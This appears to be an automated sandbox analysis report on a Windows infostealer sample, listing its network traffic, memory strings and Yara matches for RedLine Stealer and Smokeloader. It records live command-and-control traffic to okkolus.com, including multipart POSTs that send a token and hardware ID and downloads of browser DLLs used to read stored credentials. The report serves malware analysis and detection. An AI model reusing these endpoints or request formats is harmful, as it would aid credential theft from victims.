                      Source: global trafficHTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDGHCBGDHJJKECAECBAHost: okkolus.comContent-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 44 47 48 43 42 47 44 48 4a 4a 4b 45 43 41 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 62 66 33 38 61 61 34 37 35 37 33 37 37 64 34 31 63 62 34 62 37 61 62 37 39 62 65 39 31 32 38 66 33 33 30 30 65 38 63 36 63 33 63 31 30 63 38 39 34 65 61 66 32 61 39 64 31 64 32 37 35 61 34 30 65 34 34 33 66 61 35 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 48 43 42 47 44 48 4a 4a 4b 45 43 41 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 48 43 42 47 44 48 4a 4a 4b 45 43 41 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 48 43 42 47 44 48 4a 4a 4b 45 43 41 45 43 42 41 2d 2d 0d 0a Data Ascii: ------CGDGHCBGDHJJKECAECBAContent-Disposition: form-data; name="token"9bf38aa4757377d41cb4b7ab79be9128f3300e8c6c3c10c894eaf2a9d1d275a40e443fa5------CGDGHCBGDHJJKECAECBAContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------CGDGHCBGDHJJKECAECBAContent-Disposition: form-data; name="file"------CGDGHCBGDHJJKECAECBA--
                      Source: global trafficHTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JECBGCFHCFIDHIDHDGDGHost: okkolus.comContent-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 62 66 33 38 61 61 34 37 35 37 33 37 37 64 34 31 63 62 34 62 37 61 62 37 39 62 65 39 31 32 38 66 33 33 30 30 65 38 63 36 63 33 63 31 30 63 38 39 34 65 61 66 32 61 39 64 31 64 32 37 35 61 34 30 65 34 34 33 66 61 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 2d 2d 0d 0a Data Ascii: ------JECBGCFHCFIDHIDHDGDGContent-Disposition: form-data; name="token"9bf38aa4757377d41cb4b7ab79be9128f3300e8c6c3c10c894eaf2a9d1d275a40e443fa5------JECBGCFHCFIDHIDHDGDGContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------JECBGCFHCFIDHIDHDGDGContent-Disposition: form-data; name="file"------JECBGCFHCFIDHIDHDGDG--
                      Source: global trafficHTTP traffic detected: GET /dfaf16606234b71d/freebl3.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /dfaf16606234b71d/mozglue.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /dfaf16606234b71d/msvcp140.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /dfaf16606234b71d/nss3.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /dfaf16606234b71d/softokn3.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /dfaf16606234b71d/vcruntime140.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
                      Source: Joe Sandbox ViewASN Name: ASRELINKRU ASRELINKRU
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_00404C70 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,
                      Source: global trafficHTTP traffic detected: GET /dfaf16606234b71d/sqlite3.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /dfaf16606234b71d/freebl3.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /dfaf16606234b71d/mozglue.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /dfaf16606234b71d/msvcp140.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /dfaf16606234b71d/nss3.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /dfaf16606234b71d/softokn3.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /dfaf16606234b71d/vcruntime140.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
                      Source: global trafficDNS traffic detected: DNS query: okkolus.com
                      Source: unknownHTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJDGHJDBFIJKECAECAFHost: okkolus.comContent-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 38 34 39 30 35 36 38 30 36 31 32 37 38 39 35 37 33 32 30 39 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 75 6e 69 6b 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 2d 2d 0d 0a Data Ascii: ------EHJDGHJDBFIJKECAECAFContent-Disposition: form-data; name="hwid"A884905680612789573209------EHJDGHJDBFIJKECAECAFContent-Disposition: form-data; name="build"unik------EHJDGHJDBFIJKECAECAF--
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0A
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0N
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0X
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://okkolus.com
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000549000.00000040.00000001.01000000.00000003.sdmp, FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp, FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.php
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.php&)
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.php/M
                      Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.php6c3c10c894eaf2a9d1d275a40e443fa5cations
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.phpN
                      Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.phpt
                      Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000549000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.phpte3.dll
                      Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/
                      Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp, FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/freebl3.dll
                      Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/freebl3.dll94eaf2a9d1d275a40e443fa5tionComponent
                      Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp, FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/mozglue.dll
                      Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/mozglue.dll94eaf2a9d1d275a40e443fa5Extension
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/mozglue.dllVUG
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/mozglue.dlld
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/mozglue.dllrowser
                      Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/mozglue.dllser
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/msvcp140.dll
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/msvcp140.dll.
                      Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/msvcp140.dller
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/msvcp140.dlluPh
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp, FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dll
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dll.U
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dll9M
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dllJT
                      Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dlle
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dllll
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dllll_TH
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dllllx
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dlloU
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dllpatible_edge_version_number
                      Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/oTab
                      Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/ra
                      Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/soft
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/softokn3.dll
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/softokn3.dll.
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/softokn3.dllCSF
                      Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/softokn3.dller
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/sqlite3.dll
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/vcruntime140.dll
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/vcruntime140.dll%
                      Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://okkolus.com/dfaf16606234b71d/vcruntime140.dllata
                      Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://okkolus.comppData
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: mozglue[1].dll.0.dr, mozglue.dll.0.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                      Source: FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3334018362.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecop
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecopnacl
                      Source: JEHIJDGI.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: JEHIJDGI.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, JEHIJDGI.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, JEHIJDGI.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, JEHIJDGI.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: JEHIJDGI.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, JEHIJDGI.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: https://mozilla.org0/
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: https://www.digicert.com/CPS0
                      Source: JEHIJDGI.0.drString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: JEHIJDGI.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 00000000.00000002.3315657325.0000000002C37000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61EAD2AC
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E4B8A1
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E75F1F
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E40065
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E9E24F
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E5023C
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E62554
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E4E4BF
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E7A790
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E18736
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E86668
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E58670
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E10856
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61EA0BA9
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E62CA3
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E98FE2
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E88FCA
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E52F80
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61EA2F47
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E56F18
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E4CEF9
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E1EEFF
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E64E0C
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61EA91F6
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E9316A
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E9F0ED
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E9D0C3
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E8D0B6
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E6904E
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E4304E
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E15337
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E19208
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E534E3
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E77452
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E37930
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E7B85E
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E21816
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E9FBF0
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E55BD7
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E91DC1
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E6DDA5
